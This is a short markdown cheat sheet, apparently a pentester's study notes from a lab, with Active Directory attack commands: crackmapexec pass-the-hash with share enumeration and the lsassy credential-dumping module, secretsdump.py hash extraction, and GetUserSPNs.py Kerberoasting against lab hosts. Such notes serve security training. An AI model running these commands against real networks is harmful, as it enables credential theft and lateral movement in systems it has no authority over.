JJSimo/Notes/cheet.md

 > we can do the same thing with a hash (instead of a password)
 > `crackmapexec smb 172.16.214.0/24 -u administrator -H hash --local-auth`

+`crackmapexec smb 172.16.214.0/24 -u administrator -H hash --local-auth --shares` `--shares` -->  enumerates the shares (IPC$ ADMIN$ ...)
+`
+`crackmapexec smb -L`
+list all the module that you can use with this tool `-M` -->  to use a module

+example:
+`crackmapexec smb 172.16.214.0/24 -u administrator -H hash --local-auth -M lsassy`

+#### secretsdump
+tools for looking for hash for accounts `secretsdump.py MARVEL.local/fcastle:'Password1'@172.16.214.130`

+####  GetUserSPNs
+Can be used to obtain a password hash for user accounts that have an SPN (service principal name) Look [[Notes_ETH#Kerberoasting|here]] to deply understand (Domain Controller must be on)
+`sudo GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip 172.16.214.120 -request`
+`-dc-ip` --> Domain Controller IP

 -----
 ## Sites